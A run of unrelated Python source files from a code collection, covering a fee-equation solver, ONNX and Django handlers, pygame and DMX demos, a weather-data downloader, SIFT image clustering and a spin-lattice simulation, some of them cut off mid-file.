    number_of_transactions={"fivek":180000,"tenk":100000,"twentyk":100000,"fourtyk":100000,"fiftyk":100000,"onehundredk":150000,"twohundredk":50000,"threehundredk":40000,"fourhundredk":20000,"fivehundredk":2500,"onethousandk":1250}
    # First equation row: revenue coefficient per band (rate * volume).
    # NOTE(review): relies on both dicts sharing insertion order (Python 3.7+) —
    # the nested loop only pairs identical keys, so order determines column order.
    eq1=[]
    for index in percentage_cut:
        for index2 in number_of_transactions:
            if(index2==index):
                eq1.append(percentage_cut[index]*number_of_transactions[index2])
    # Difference rows: value[k+1] - value[k] equals a fixed step (see b below).
    eq3=[-1,1,0,0,0,0,0,0,0,0,0]
    eq4=[0,-1,1,0,0,0,0,0,0,0,0]
    eq5=[0,0,-1,1,0,0,0,0,0,0,0]
    eq6=[0,0,0,-1,1,0,0,0,0,0,0]
    eq7=[0,0,0,0,-1,1,0,0,0,0,0]
    eq8=[0,0,0,0,0,-1,1,0,0,0,0]
    eq9=[0,0,0,0,0,0,-1,1,0,0,0]
    eq10=[0,0,0,0,0,0,0,-1,1,0,0]
    eq11=[0,0,0,0,0,0,0,0,-1,1,0]
    # Pins the first band's value directly.
    eq_v1=[1,0,0,0,0,0,0,0,0,0,0]
    a = np.array([eq1, eq11,eq3,eq4,eq5,eq6,eq7,eq8,eq9,eq10,eq_v1])
    # Right-hand side: target profit (Tsh), then the band steps, then v1's value.
    b = np.array([200000*2290,500000,5000,10000,30000,50000,100000,100000,100000,100000,5000])
    x = np.linalg.solve(a, b)
    total_number_of_transactions=0
    temp=0
    # Report per band: solved amount, cumulative USD profit (2290 Tsh/USD),
    # volume, percentage and the rounded per-transaction cut.
    for index,value in enumerate(percentage_cut):
        for index2,value2 in enumerate(number_of_transactions):
            for index3,value3 in enumerate(x):
                if(index==index2==index3):
                    temp+=percentage_cut[value]*value3*number_of_transactions[value2]/2290
                    print("Amount:Tsh {} :P_Co:$ {}: Transactions {} : % {} : Cut {} ".format(round(value3),round(temp),number_of_transactions[value2],percentage_cut[value],round(percentage_cut[value]*value3)))
                    total_number_of_transactions+=number_of_transactions[value2]
    print("Total Number of Transactions {}".format(total_number_of_transactions))
sove_higher_orde_eq()
# print('old ')
# solve()
|
999,442 | a799f05ef5f17eeffcdf849d2b1dea1e3bde66cb | from onnx_tf.handlers.frontend_handler import FrontendHandler
from onnx_tf.handlers.handler import onnx_op
from onnx_tf.handlers.handler import tf_op
from .math_mixin import BasicMathMixin
@onnx_op("Floor")
@tf_op("Floor")
class Floor(BasicMathMixin, FrontendHandler):
    """Frontend handler mapping TensorFlow's Floor op onto ONNX's Floor op."""

    @classmethod
    def version_1(cls, node, **kwargs):
        # Opset 1: delegated to the shared elementwise-math helper.
        return cls.basic_math_op(node, **kwargs)

    @classmethod
    def version_6(cls, node, **kwargs):
        # Opset 6: same delegation as version 1 for this op.
        return cls.basic_math_op(node, **kwargs)
|
999,443 | 57f077f94e55909bd9128699f80d6a5d4eed5155 | #!/usr/bin/python
from cydmx import dmxwidget
import math
import random
class SurfBall (dmxwidget.Widget) :
    """Bouncing-ball widget: a coloured blob that reflects off the panel edges.

    NOTE(review): Python 2 code (uses ``xrange``).
    """

    def init(self, panel) :
        # Framework init hook (called by dmxwidget, not Python's __init__) —
        # presumably invoked once before drawing; confirm against dmxwidget.
        self.hue = 0.9
        self.center_x=0.0
        self.center_y=0.0
        # per-frame velocity, in panel cells
        self.dx=0.4
        self.dy=0.5

    def draw(self, panel) :
        # Advance the ball; reflect off each edge and clamp to the border.
        self.center_x+=self.dx
        self.center_y+=self.dy
        if self.center_x>(panel.width-1):
            self.dx = -self.dx #+ (0.5 - random.random())/10.
            self.center_x = panel.width - 1
        elif self.center_x<0:
            self.dx = -self.dx #+ (0.5 - random.random())/10
            self.center_x = 0
        if self.center_y>(panel.height-1):
            self.dy = -self.dy #+ (0.5 - random.random())/10
            self.center_y = panel.height - 1
        elif self.center_y<0:
            self.dy=-self.dy #+ (0.5 - random.random())/10
            self.center_y = 0
        # Repaint every cell relative to the new centre.
        for row in xrange(panel.height):
            for column in xrange(panel.width):
                setColor(panel, self.hue, self.center_x, self.center_y, row, column)
        panel.outputAndWait(30)
def colorset(panel, hue, brightness, x, y):
    """Set the single pixel at (x, y) — truncated to ints — to *hue* at
    *brightness* with zero saturation."""
    row, col = int(y), int(x)
    panel.lights[row][col].sethue(hue, brightness, 0)
def setColor(panel, hue, x, y, row, col):
    """Light pixel (row, col) based on its distance from the ball centre (x, y).

    Hue and brightness fall off as Gaussians of the distance; saturation
    falls off as 1/(1 + d^2).  (The *hue* argument is currently unused.)
    """
    hue_sigma = 3       # hue variance
    bright_sigma = 5    # brightness variance
    dist = math.sqrt((x - col) ** 2. + (y - row) ** 2)
    gauss_norm = math.sqrt(2 * math.pi)
    point_hue = 2 * hue_sigma * math.exp(-dist ** 2 / (2 * hue_sigma ** 2)) / (hue_sigma * gauss_norm)
    point_brightness = 3 * bright_sigma * math.exp(-dist ** 2 / (2 * bright_sigma ** 2)) / (bright_sigma * gauss_norm)
    point_saturation = 1 / (1 + dist ** 2)
    panel.lights[row][col].sethue(point_hue, point_brightness, point_saturation)
def clear(panel):
    """Black out the entire panel (hue, brightness and saturation all zero)."""
    for strip in panel.lights:
        for lamp in strip:
            lamp.sethue(0, 0, 0)
if __name__=="__main__" :
dmxwidget.WidgetServer().run([SurfBall])
|
999,444 | 27951f294851f0a001069a4c37fc8d29bfdb8a77 | import pygame
import sys
from pygame.locals import *
# Minimal pygame demo: draw one diagonal line until the window is closed.
pygame.init()
screen=pygame.display.set_mode((600,500))
pygame.display.set_caption("Drawing A Line")
# Main loop: poll events, repaint every frame.
while True :
    for event in pygame.event.get():
        if event.type==QUIT:
            sys.exit()
    # dark-green background
    screen.fill((0,80,0))
    #draw the line
    color=100,255,200
    width=8
    pygame.draw.line(screen,color,(100,100),(500,400),width)
    pygame.display.update()
|
999,445 | d1ade014f5827eb0f4e000fac225d683558f51b8 | from django.core.management.base import BaseCommand
from django.db.models import Q
from animals.models import Animal, Person, Location
from datetime import datetime
import xlrd
from xlrd import xldate_as_datetime
class Command(BaseCommand):
    """Management command: import animals from the mice2giveaway Excel sheet.

    Rows already present (matched on several identifying fields) are skipped;
    unknown locations are created on the fly.
    """

    help = 'Import existing data from mice2giveaway excel list'

    def add_arguments(self, parser):
        # One or more workbook paths; only the first is processed in handle().
        parser.add_argument('filename', nargs='+', type=str)

    def handle(self, *args, **options):
        lines_count = 0  # rows actually imported (duplicates excluded)
        fname = options['filename'][0]
        xl = xlrd.open_workbook(fname) # Open the workbook
        # for sheet in (2,0):
        for sheet in (0,):
            print('Sheet #' + str(sheet))
            xl_sheet = xl.sheet_by_index(sheet) # grab sheet
            num_cols = xl_sheet.ncols # Number of columns
            for row_idx in range(1, xl_sheet.nrows): # Iterate through rows
                # progress dot per data row (row 0 is the header)
                print('.', end ="", flush=True)
                a = Animal()
                a.animal_type = 'fish'
                a.available_from = datetime.today().date()
                # Column layout below is 0-based; German column headers noted.
                a.comment = str(xl_sheet.cell(row_idx, 0).value).strip()
                a.sex = str(xl_sheet.cell(row_idx, 1).value).strip().lower() or 'u' # Geschlecht
                a.line = str(xl_sheet.cell(row_idx, 2).value).strip() # Zuchtlinie
                a.lab_id = str(xl_sheet.cell(row_idx, 3).value).strip() # Käfig-ID
                a.database_id = str(xl_sheet.cell(row_idx, 4).value).strip() # Tier-ID
                a.day_of_birth = xldate_as_datetime(xl_sheet.cell(row_idx, 5).value, xl.datemode) #Geb.
                a.amount = int(xl_sheet.cell(row_idx, 7).value) # Anzahl
                a.licence_number = str(xl_sheet.cell(row_idx, 11).value).strip() # Aktenzeichen
                location_name = str(xl_sheet.cell(row_idx, 13).value).strip() # Raum
                responsible_person = str(xl_sheet.cell(row_idx, 16).value).strip().strip() # Verantwortliche Person
                a.available_to = xldate_as_datetime(xl_sheet.cell(row_idx, 22).value, xl.datemode)
                # Resolve the location, lazily creating it when missing.
                try:
                    a.location = Location.objects.get(name=location_name)
                except Location.DoesNotExist:
                    loc = Location(name=location_name)
                    loc.save()
                    a.location = loc
                # The person cell may hold an email or a name; match either.
                a.responsible_person = Person.objects.get(Q(email=responsible_person.lower()) | Q(name__iexact=responsible_person.lower()))
                # Deduplicate: only save when no identical record exists yet.
                # NOTE(review): a.entry_date is never assigned above, so this
                # lookup uses the unsaved field value/default — confirm intended.
                try:
                    Animal.objects.get(entry_date=a.entry_date,
                                       day_of_birth=a.day_of_birth,
                                       available_from=a.available_from,
                                       available_to=a.available_to,
                                       line=a.line,
                                       database_id=a.database_id,
                                       lab_id=a.lab_id,
                                       location=a.location,
                                       sex=a.sex)
                except Animal.DoesNotExist:
                    a.save()
                    lines_count += 1
        print()
        self.stdout.write(self.style.SUCCESS('Successfully imported %i lines.' % lines_count))
|
999,446 | f2b9870cab764e5026f29b34973e17693057418e | """locum URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from patron.views import PatronViewSet, CheckoutViewSet
from harvest.views import WorkRecordViewSet, BibliographicRecordViewSet
from ratings.views import WishViewSet, RatingViewSet, ReviewViewSet
from tags.views import TagViewSet, LabelViewSet
# DRF router: one REST endpoint per registered viewset.
router = routers.DefaultRouter()
router.register(r'patrons', PatronViewSet)
# base_name given explicitly here — presumably because CheckoutViewSet lacks a
# queryset for the router to derive it from; confirm against the viewset.
router.register(r'checkouts', CheckoutViewSet, base_name='checkouts')
router.register(r'works', WorkRecordViewSet)
router.register(r'bibs', BibliographicRecordViewSet)
router.register(r'wishes', WishViewSet)
router.register(r'ratings', RatingViewSet)
router.register(r'reviews', ReviewViewSet)
router.register(r'tags', TagViewSet)
router.register(r'labels', LabelViewSet)
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^search/', include('search.urls', namespace="search")),
]
# Router-generated routes are appended after the explicit patterns.
urlpatterns += router.urls
|
999,447 | 22439165fb41cb1f4418054c8981772a92165e2c | from Actions.Quit import QuitAction
from Actions.ActionManager import ActionManager
|
999,448 | feb95362d8a1788007a470db093237bae9b3ec05 | # simultaneous reading and writing to a file in python
queue
|
999,449 | 2bd3cd2e89478ab46588c277f3f0c6fb635983f3 | # 导入unittest
import unittest
from funcdemo.CalcDemo import Calc
from Commonlib.ReadXml import readXml
# # 创建对象
# r = readXml()
# a = int(r.read_xml("../DataXml/data.xml","jia","num1"))
# b = int(r.read_xml("../DataXml/data.xml","jia","num2"))
# ex = int(r.read_xml("../DataXml/data.xml","jia","expect"))
# 优化
r = readXml()
# 继承
# Inherit from unittest.TestCase so the runner can discover these tests.
class Test1(unittest.TestCase):
    # Set-up hook: runs before every test method.
    def setUp(self):
        print("开始")

    # Tear-down hook: runs after every test method.
    def tearDown(self):
        print("结束")

    def test001(self):
        # Addition: operands and expected result come from the XML data file.
        # create the calculator object
        ca = Calc()
        res1 = ca.jia(int(r.read_xml("../DataXml/data.xml","jia","num1")),int(r.read_xml("../DataXml/data.xml","jia","num2")))
        # compare actual vs expected
        self.assertEqual(res1,int(r.read_xml("../DataXml/data.xml","jia","expect")))

    def test002(self):
        # Subtraction: operands and expected result come from the XML data file.
        # create the calculator object
        ca = Calc()
        res2 = ca.jian(int(r.read_xml("../DataXml/data.xml","jian","num1")),int(r.read_xml("../DataXml/data.xml","jian","num2")))
        # compare actual vs expected
        self.assertEqual(res2,int(r.read_xml("../DataXml/data.xml","jian","expect")))
if __name__ == '__main__':
unittest.main()
|
999,450 | aec584327831b44545169d3b8aa26b1ccce6a97b | # Library of functions to list, download and save ECCC Precipitation data
# Andrew Ireson
# 17-March-2020
import pandas as pd
import matplotlib.pyplot as pl
import numpy as np
def StationList():
    """Load the full ECCC station inventory as a DataFrame.

    The CSV ships with a 3-line preamble before the header row, hence
    ``skiprows=3``.
    """
    return pd.read_csv('ECCC_Precip/Station Inventory EN.csv',skiprows=3)
def SearchByProvince(SearchTerm,stations):
provs=stations['Province']
i=[count for count, prov in enumerate(provs) if SearchTerm.lower() in prov.lower()]
provsfound=sorted(set(provs[i]))
if len(provsfound)>1:
print('Multiple provinces found - consider improving your search term')
print('%d stations found'%(len(stations.iloc[i])))
elif len(provsfound)==0:
print('No provinces found - improve your search term')
else:
print('%d stations found in province %s'%(len(stations.iloc[i]),provsfound[0]))
return stations.iloc[i]
def SearchByName(SearchTerms,stations):
    """Return the rows of *stations* whose Name contains every term in
    *SearchTerms* (case-insensitive), printing a summary table."""
    names = stations['Name']
    matched = []
    for term in SearchTerms:
        lowered = term.lower()
        current = [idx for idx, name in enumerate(names) if lowered in name.lower()]
        if matched == []:
            matched = current
        else:
            matched = [idx for idx in current if idx in matched]
    PrintSummary(stations.iloc[matched])
    return stations.iloc[matched]
def PrintSummary(stations):
    """Print one line per station: name, station id, first and last year of record."""
    print('%d stations found'%len(stations))
    print(38*' '+'Station name: Station ID From To ')
    rows = zip(stations['Name'],stations['Station ID'],stations['First Year'],stations['Last Year'])
    for name, sid, first, last in rows:
        print('%50s: %s %d %d'%(name,sid,first,last))
def GetURL(StationID,Year):
    """Build the ECCC bulk-download CSV URL for one station-year of daily
    data (timeframe=2); the year is zero-padded to four digits."""
    base = ('https://climate.weather.gc.ca/climate_data/bulk_data_e.html'
            '?format=csv&stationID={sid}&Year={year:04d}'
            '&timeframe=2&submit=%20Download+Data')
    return base.format(sid=StationID, year=Year)
def PreviewData(StationID,Year):
    """Download one station-year of daily data and print the first few rows."""
    print("downloading %4d" % Year)
    df=GetDataFrame(GetURL(StationID,Year))
    print(df.head())
    return
def GetDataFrame(MyURL):
    """Fetch a CSV from *MyURL* into a DataFrame indexed by its 'Date/Time' column."""
    # latin1: ECCC CSVs contain accented French characters.
    df=pd.read_csv(MyURL, index_col='Date/Time', parse_dates=True, encoding='latin1')
    return df
def GetAllData(StartYear,EndYear,StationID):
    """Download the daily precipitation columns for every year in
    [StartYear, EndYear] and concatenate them into one DataFrame."""
    Years = np.arange(StartYear,EndYear+1)
    print("downloading %4d" % StartYear)
    df=GetDataFrame(GetURL(StationID,Years[0]))
    # keep only the precipitation columns
    weather=df[['Total Rain (mm)','Total Snow (cm)','Total Precip (mm)']]
    n=len(Years)
    for i in range(1,n):
        print("downloading %4d" % Years[i])
        df=GetDataFrame(GetURL(StationID,Years[i]))
        df=df[['Total Rain (mm)','Total Snow (cm)','Total Precip (mm)']]
        weather=pd.concat([weather,df])
    return weather
|
999,451 | ab71ac2567febe2da5ad950919b6e7f2de12ade6 | from django.db import models
# from django.core.urlresolvers import reverse (Descontinuado)
from django.urls import reverse
from systemgrafo.neo4japp import db
# Create your models here.
class NodeHandle(models.Model):
    """Abstract Django model pairing a relational row with a Neo4j graph node.

    The relational side stores only bookkeeping (handle id + timestamps);
    the node data itself lives in the graph and is fetched via ``node()``.
    """

    # Graph-side identifier; immutable once created.
    handle_id = models.CharField(max_length=64, unique=True, editable=False)
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)

    class Meta:
        abstract = True

    def __str__(self):
        return 'NodeHandle for node %d' % self.node()['handle_id']

    def node(self):
        # The concrete subclass name doubles as the node label in Neo4j.
        return db.get_node(self.handle_id, self.__class__.__name__)

    def delete(self, **kwargs):
        """Delete that node handle and the handles node."""
        # Remove the graph node first, then the relational handle row.
        db.delete_node(self.handle_id, self.__class__.__name__)
        super(NodeHandle, self).delete()
        return True
    delete.alters_data = True
class Protein(NodeHandle):
    """Handle for a Protein node; display data is read live from the graph."""

    def __str__(self):
        return self.name

    def _name(self):
        # Pull the name from the graph node; the node may be missing or
        # lack properties, hence both fallbacks.
        try:
            return self.node().properties.get('name', 'Missing title')
        except AttributeError:
            return 'Nó ausente?'
    name = property(_name)

    def get_absolute_url(self):
        return reverse('protein-detail', args=[str(self.id)])

    def _codif_protein(self):
        # Genes whose graph nodes direct (encode) this protein, resolved
        # back to their Django handles.
        genes = []
        for gene in db.get_directors(self.handle_id):
            genes.append({'gene': Gene.objects.get(handle_id=gene['handle_id'])})
        return genes
    codif_protein = property(_codif_protein)
class Gene(NodeHandle):
    """Handle for a Gene node; display data is read live from the graph."""

    def __str__(self):
        return self.name

    def _name(self):
        # Pull the name from the graph node, falling back when the node
        # is missing or has no properties.
        try:
            return self.node().properties.get('name', 'Missing name')
        except AttributeError:
            return 'Nó ausente?'
    name = property(_name)

    def get_absolute_url(self):
        return reverse('gene-detail', args=[str(self.id)])

    def _proteins(self):
        # Proteins linked to this gene in the graph, with the relationship
        # details carried alongside each Django handle.
        proteins = []
        for protein in db.get_proteins(self.handle_id):
            proteins.append({'protein': Protein.objects.get(handle_id=protein['handle_id']),
                             'relationships': protein['relationships']})
        return proteins
    proteins = property(_proteins)
|
999,452 | 12c37cb28440fc4034800d5df782621fb8c42557 | import pymongo
with pymongo.MongoClient() as conn:
db = conn.stu
myset = db.ccc
p = [
{'$group': {'_id': 'name', 'count': {'$sum': 1}}},
{'$match': {'count': {'$gt': 1}}}
]
cursor = myset.aggregate(p)
for item in cursor:
print(item)
|
999,453 | c79cdcfed6d862a5c6b9d74e38190fbfa0dd1369 | import matplotlib.pyplot as plt
import cv2
import numpy as np
import sys
import glob
import os
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
def imageDistance(imgName1, imgName2, link=3):# returns distance between 2 images
    """Distance between two images via SIFT keypoint matching.

    link selects the linkage: 1 = min match distance, 2 = max match
    distance, anything else = mean match distance.
    Exits the process if either image fails to load.
    """
    img1 = cv2.imread(imgName1)
    img2 = cv2.imread(imgName2)
    if img1 is None or img2 is None:
        print "Images not found", type(img1), imgName1, type(img2), imgName2
        exit(0)
    gray1= cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)
    gray2= cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)
    # SIFT keypoints + descriptors on the grayscale images.
    sift = cv2.xfeatures2d.SIFT_create()
    kp1, des1 = sift.detectAndCompute(gray1,None)
    kp2, des2 = sift.detectAndCompute(gray2,None)
    # Brute-force matcher, L2 norm, mutual-best matches only.
    bf = cv2.BFMatcher(cv2.NORM_L2, crossCheck=True)
    matches = bf.match(des1,des2)
    if link==1:
        return min(matches, key=lambda x: x.distance).distance
    elif link==2:
        return max(matches, key=lambda x: x.distance).distance
    else:#mean
        # NOTE(review): raises ZeroDivisionError when no matches are found.
        distSum=0
        for x in matches:
            distSum+= x.distance
        return distSum/len(matches)
def files(path):
    """Glob *path* and wrap each match for clustering.

    Returns (points, first_match) where each point is a dict
    {'name': file_path, 'c': first_match}; the first glob hit doubles
    as the initial cluster centre.
    """
    matches = glob.glob(path)
    first = matches[0]
    points = [{'name': name, 'c': first} for name in matches]
    return points, first
def Gonzalez(k, points, c1):
    """Gonzalez farthest-first k-centre seeding over image distances.

    Interactively asks the user for the first centre ('n' keeps c1),
    then repeatedly promotes the point farthest from its current centre
    until k centres exist. Mutates each point's 'c' and 'distance'.
    Returns the list of chosen centres.
    """
    print "starting gonzy"
    centers=set()
    x = raw_input('Write center name or n if you want me to choose: ')
    print x
    if x!='n':
        c1 = '../../dataSets/'+x
    centers.add(c1)
    print c1
    # Assign every point to the initial centre.
    for point in points:
        point.update({'c':c1})
        point.update({'distance':imageDistance(point['name'],c1)})
    for i in range (1,k):
        # Find the point farthest from its assigned centre; it becomes
        # the next centre (classic farthest-first traversal).
        maxDist = -1
        c=c1
        for point in points:
            distancePtC = imageDistance(point['name'],point['c'])
            if distancePtC>maxDist:
                maxDist = distancePtC
                c=point['name']
        centers.add(str(c))
        # Reassign points that are closer to the new centre.
        for point in points:
            distancePtOC = imageDistance(point['name'],point['c'])
            distancePtNC = imageDistance(point['name'],c)
            #print "distance to point ",point['c']," " , distancePtOC, "distance to point ",c ," ", distancePtNC
            if distancePtOC>distancePtNC:
                point['c']=c
                point['distance']=distancePtNC
    return list(centers)
def compare(c1, c2):
    """Return 1 if the two collections differ as sets of members, else 0."""
    if any(item not in c2 for item in c1):
        return 1
    if any(item not in c1 for item in c2):
        return 1
    return 0
def lloyds(centers, points): # centers is a list of center image. points is a list of images
    """Lloyd-style refinement of image-cluster centres.

    Runs 3 assignment passes: each point is attached to its nearest
    centre (by imageDistance) and collected into clusters.
    Returns (centers, clusters).
    """
    newCenters=list(centers)
    cent=centers.pop(2) # to make them unequal the first time.
    times = 3
    while(times>0):
        centers=list(newCenters)
        print len(centers), "---95---"
        clusters=[]
        for i in range(len(centers)):
            clusters.append([])
        # Assignment step: nearest centre wins.
        for p in points:
            nearestD = 999999999
            nearestC=-1
            for c in range(len(centers)):
                distance = imageDistance(centers[c], p['name'])
                if distance<nearestD:
                    nearestD = distance
                    nearestC = c
            p['c']=centers[nearestC]
            clusters[nearestC].append(p)
        for c in clusters:
            print len(c)
        times-=1
        print times
        continue
        # NOTE(review): everything below this unconditional `continue` is
        # unreachable — the medoid-update step never runs, so this is
        # assignment-only, not full Lloyd's. Confirm whether intentional.
        newCenters=[]
        minDist=9999999999
        center=''
        distancesSaved={}
        for c in clusters:
            print len(clusters), len(c), " number of clusters, and number of points in each cluster"
            count=0
            for pt1 in c:
                sumDist=0
                for pt2 in c:
                    count+=1
                    print count," count"
                    # Cache symmetric pair distances to avoid recomputation.
                    if pt1['name']<pt2['name']:
                        x = (pt1['name'],pt2['name'])
                    else:
                        x = (pt2['name'],pt1['name'])
                    if x in distancesSaved:
                        val = distancesSaved[x]
                    else:
                        val = np.power(imageDistance(pt1['name'],pt2['name']),2)
                        distancesSaved[x]=val
                    sumDist+= val
                if minDist>sumDist:
                    minDist=sumDist
                    center=pt1['name']
            newCenters.append(center)
    print len(centers),"---146---"
    return centers, clusters
def clusterImages(centerToImageMap):
    """Copy every clustered image into a directory named after its centre."""
    #print centerToImageMap
    for center in centerToImageMap:
        if not os.path.exists(str(center)):
            os.makedirs(str(center))
        for fileName in centerToImageMap[center]:
            srcFile = fileName
            dstFile = str(center) + '/'
            print srcFile
            # NOTE(review): builds a shell command from file names —
            # shell-injection risk if names ever contain quotes/metachars;
            # shutil.copy would be safer.
            os.system('cp \"'+ srcFile + '\" ' + dstFile)
def main():
    """Cluster the ../../dataSets images into k groups and copy them into per-cluster dirs."""
    points,c1=files("../../dataSets/*")
    k=3
    # Gonzalez seeding is disabled; a previously computed result is
    # hard-coded below so runs skip the expensive seeding phase.
    #centers= Gonzalez(k,points,c1)
    centers = ['../../dataSets/Baseball_.jpg', '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg', '../../dataSets/img-thing.jpg']
    points = [{'distance': 261.2919604437692, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball-large-1.jpg'}, {'distance': 271.36981928507487, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/1150SFR-2.jpg'}, {'distance': 299.62686694231155, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/1b404498-b7b8-44e8-85d3-23fff5e5395b.jpg'}, {'distance': 303.7726349623307, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/2013-02-25_00004.jpg'}, {'distance': 309.7969883282979, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/2013_Baseball_glove2012040424._V386376726_.jpg'}, {'distance': 298.0247405578043, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/310654M01 (1).jpg'}, {'distance': 292.06456663842295, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/310654M01 (2).jpg'}, {'distance': 292.06456663842295, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/310654M01.jpg'}, {'distance': 306.71920147831577, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/51YER+oAbaL._SY300_.jpg'}, {'distance': 311.9697136714541, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/8069-1_display.jpg'}, {'distance': 268.09523203793697, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/9-inch-handmade-Baseball-Ball-for-children-s-training-baseball-softball-kids-baseball-balls-game-sport.jpg'}, {'distance': 310.24679005940754, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/ash_clear_baseball_bat1_3.jpg'}, {'distance': 305.149411452444, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball-bat.jpg'}, {'distance': 275.1050336970839, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball-icon.png'}, {'distance': 256.8518034976186, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball.jpg'}, {'distance': 251.25533689815757, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball1).jpg'}, 
    {'distance': 0.0, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/Baseball_.jpg'}, {'distance': 262.6793841044108, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball_1600_clr_11646.png'}, {'distance': 272.8768889328529, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball_3.png'}, {'distance': 238.9001382191976, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball_bat_cm-f.jpg'}, {'distance': 287.9864354469407, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/cddfa81560c7da378eca2b060eec3cb3.jpg'}, {'distance': 0.0, 'c': '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg', 'name': '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg'}, {'distance': 281.4659144083659, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/download (1).jpg'}, {'distance': 272.2540369807063, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/download.jpg'}, {'distance': 302.982531015174, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/il_570xN.335862384.jpg'}, {'distance': 0.0, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/img-thing.jpg'}, {'distance': 292.39212783044127, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/infield-baseball-glove-1.jpg'}, {'distance': 318.9177953880953, 'c': '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg', 'name': '../../dataSets/louisville-slugger-bat.png'}, {'distance': 318.0376394567355, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/mizuno-mzm271-youth-little-league-maple-wood-baseball-bat-2.jpg'}, {'distance': 252.970651358793, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/MP910220738.jpg'}, {'distance': 270.0766422662709, 'c': '../../dataSets/Baseball_.jpg', 'name': 
    '../../dataSets/rawlings-pro-preferred-pros1175cbr-11-75-baseball-glove-right-hand-throw-11.jpg'}, {'distance': 248.37743021870216, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/SportsAttack_leather_baseball_large.jpg'}, {'distance': 255.0884132385254, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/_32.jpg'}]
    print "gonzy done, starting lloyd"
    centers, clusters = lloyds(centers,points)
    # for x in centers:
    #     print x
    # for y in points:
    #     print y
    # print centers
    # print points
    # Rebuild clusters as {index: [file names]} and count "faults":
    # points that sit closer to some other centre than their own.
    clusters={i:[] for i in range(k)}
    fault=0
    for point in points:
        for i in range(k):
            print point,len(centers)
            if point['c']==centers[i]:
                clusters[i].append(point['name'])
            if point['c']!=centers[i]:
                if point['distance']>imageDistance(point['name'],centers[i]):
                    fault+=1
    print clusters
    clusterImages(clusters)
    print fault
main()
|
999,454 | 93b37c09cbc6a76fc6ed4722253c91fb3580aa09 | import numpy as np
import random
import time
# Lattice size and spin-angle arrays (theta: polar, phi: azimuthal).
L=24
theta=np.zeros((L,L))
phi=np.zeros((L,L))
s=np.zeros((L,L,3))
# Output files are opened in append mode so repeated runs accumulate rows.
f=open('Heat2.csv','ab')
g=open('Heat1.csv','ab')
def chirality(theta, phi):
    """Total scalar chirality of the L x L spin lattice.

    Unit spins are rebuilt from the (theta, phi) angle arrays, the
    lattice is zero-padded by one site on every edge, and each site
    accumulates s_i . (s_a x s_b) over its four neighbouring plaquettes.
    """
    spins = np.zeros((L, L, 3))
    spins[:, :, 0] = np.sin(theta) * np.cos(phi)
    spins[:, :, 1] = np.sin(theta) * np.sin(phi)
    spins[:, :, 2] = np.cos(theta)
    # Zero padding: plaquette terms that reach off-lattice vanish.
    padded = np.zeros((L + 2, L + 2, 3))
    padded[1:L + 1, 1:L + 1, :] = spins
    total = 0
    for row in range(L):
        for col in range(L):
            centre = padded[row + 1, col + 1, :]
            right = padded[row + 2, col + 1, :]
            left = padded[row, col + 1, :]
            up = padded[row + 1, col + 2, :]
            down = padded[row + 1, col, :]
            total = total + np.dot(centre, np.cross(right, up)) + np.dot(centre, np.cross(left, up)) + np.dot(centre, np.cross(right, down)) + np.dot(centre, np.cross(left, down))
    return total
def magnet(theta):
    """Return the mean z-magnetisation <cos(theta)> of the lattice.

    Fixes two issues in the original: a zeros array was allocated and
    immediately overwritten (dead code), and the normalisation used the
    module-level constant L*L instead of the array's own size — using
    np.mean generalises to any lattice shape while giving identical
    results for the (L, L) arrays used here.
    """
    return np.mean(np.cos(theta))
def monte(s,theta,phi,T):
